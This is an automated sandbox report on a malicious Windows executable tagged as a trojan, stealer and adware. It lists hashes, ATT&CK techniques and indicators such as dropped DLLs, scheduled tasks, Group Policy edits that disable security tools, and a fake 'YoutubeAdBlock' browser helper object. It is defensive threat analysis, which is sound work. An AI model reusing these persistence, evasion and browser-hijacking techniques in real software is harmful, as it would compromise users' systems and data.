ddc7f4b27173a2b55af5fc5550fb41cd05d28fca932d1eb79d17bea79cc30b9c

Analysis

max time kernel
132s
max time network
131s
platform
windows7_x64
resource
win7v20210408
submitted
21-06-2021 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1ef565125b92bec9766369c997694ad2.exe
Size

6.2MB
MD5

1ef565125b92bec9766369c997694ad2
SHA1

9ddea371f965b67fa491141621cfb574a1e9725c
SHA256

ddc7f4b27173a2b55af5fc5550fb41cd05d28fca932d1eb79d17bea79cc30b9c
SHA512

cba1597858a6f061d967cc12e76f7d13447727a94064f6a1ee681715f509d5832181795898ec80eb53d76c37f1b3d50b0723eb80493fd1c89aa59194bc62c25e

Score

10^/10

adware discovery evasion persistence spyware stealer trojan

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

9 1636 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exepcwFfkT.exewfgcocW.exedKoAlFD.exe

pid process

1276 SimplInst.exe
1428 SimplInst.exe
536 pcwFfkT.exe
1492 wfgcocW.exe
636 dKoAlFD.exe

flow	pid	process
9	1636	rundll32.exe

pid	process
1276	SimplInst.exe
1428	SimplInst.exe
536	pcwFfkT.exe
1492	wfgcocW.exe
636	dKoAlFD.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Loads dropped DLL 13 IoCs

Processes:

1ef565125b92bec9766369c997694ad2.exeSimplInst.exeSimplInst.exerundll32.exe

pid	process
1100	1ef565125b92bec9766369c997694ad2.exe
1276	SimplInst.exe
1276	SimplInst.exe
1276	SimplInst.exe
1276	SimplInst.exe
1276	SimplInst.exe
1428	SimplInst.exe
1428	SimplInst.exe
1428	SimplInst.exe
1636	rundll32.exe
1636	rundll32.exe
1636	rundll32.exe
1636	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

Drops file in System32 directory 18 IoCs

Processes:

powershell.exepcwFfkT.exepowershell.exepowershell.exeSimplInst.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exerundll32.exepowershell.exepowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	pcwFfkT.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	pcwFfkT.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Program Files directory 64 IoCs

Processes:

wfgcocW.exe

description	ioc	process
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fil\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hi\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sr\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\aeeUMzx.dll	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fr\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hr\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lt\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\no\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sv\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\da\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\VNKQGqYHmmeRk.dll	wfgcocW.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\IkzIGZF.dll	wfgcocW.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\am\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\bg\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ca\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\cs\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en_GB\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ja\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_CN\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_TW\messages.json	wfgcocW.exe
File opened for modification	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	wfgcocW.exe
File created	C:\Program Files (x86)\fcsvEsvhbcUn\rdUiJXY.dll	wfgcocW.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	wfgcocW.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\be\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\el\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\ksGNajI.xml	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\es\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ml\messages.json	wfgcocW.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\background.html	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mr\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_BR\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sw\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ar\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hu\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mk\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_PT\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\te\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\Z29V4M.dll	wfgcocW.exe
File created	C:\Program Files (x86)\anjFGKdzU\NQqHmR.dll	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en_US\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ro\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\tEPkMPP.exe	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\it\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ko\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\nl\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sl\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\tr\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\uk\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\vi\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\es_419\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fa\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\gu\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\id\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lv\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\tbCxIwm.xml	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\bn\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\kn\messages.json	wfgcocW.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pl\messages.json	wfgcocW.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\JRajWlGIFNTafba.job	schtasks.exe
File created	C:\Windows\Tasks\wNQepEmyQbhZnWiRT.job	schtasks.exe
File created	C:\Windows\Tasks\bqZkKdgiyjBiVwZYfn.job	schtasks.exe
File created	C:\Windows\Tasks\jrzNdZzegeVMzeqYf.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1676	schtasks.exe
1764	schtasks.exe
1052	schtasks.exe
2036	schtasks.exe
456	schtasks.exe
1632	schtasks.exe
1632	schtasks.exe
1376	schtasks.exe
1436	schtasks.exe
1004	schtasks.exe
1256	schtasks.exe
1504	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exeSimplInst.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe

Modifies Internet Explorer settings 1 TTPs 19 IoCs

adware spyware

Modify Registry

T1112

Processes:

wfgcocW.exedKoAlFD.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	wfgcocW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights	wfgcocW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	wfgcocW.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	wfgcocW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	wfgcocW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MAIN	wfgcocW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	wfgcocW.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\tEPkMPP.exe = "9999"	wfgcocW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	wfgcocW.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	dKoAlFD.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "tEPkMPP.exe"	wfgcocW.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "tEPkMPP.exe"	wfgcocW.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	wfgcocW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Approved Extensions	wfgcocW.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd3495506b2430f0a9006e4d920778100	wfgcocW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	wfgcocW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	wfgcocW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	dKoAlFD.exe

Modifies data under HKEY_USERS 40 IoCs

Processes:

rundll32.exepowershell.exewscript.exewfgcocW.exepcwFfkT.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wfgcocW.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wfgcocW.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadDecisionReason = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-eb-64-ed-2a-11\WpadDecisionTime = 40b25dc87b66d701	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 6095fcad7b66d701	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000e0e3a6ad7b66d701	pcwFfkT.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadDecisionTime = 40b25dc87b66d701	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadDecision = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\06-eb-64-ed-2a-11	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	pcwFfkT.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-eb-64-ed-2a-11	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-eb-64-ed-2a-11\WpadDecision = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-eb-64-ed-2a-11\WpadDecisionReason = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	pcwFfkT.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wfgcocW.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a070019000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	pcwFfkT.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	pcwFfkT.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadNetworkName = "Network"	rundll32.exe

Modifies registry class 64 IoCs

Processes:

wfgcocW.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	wfgcocW.exe
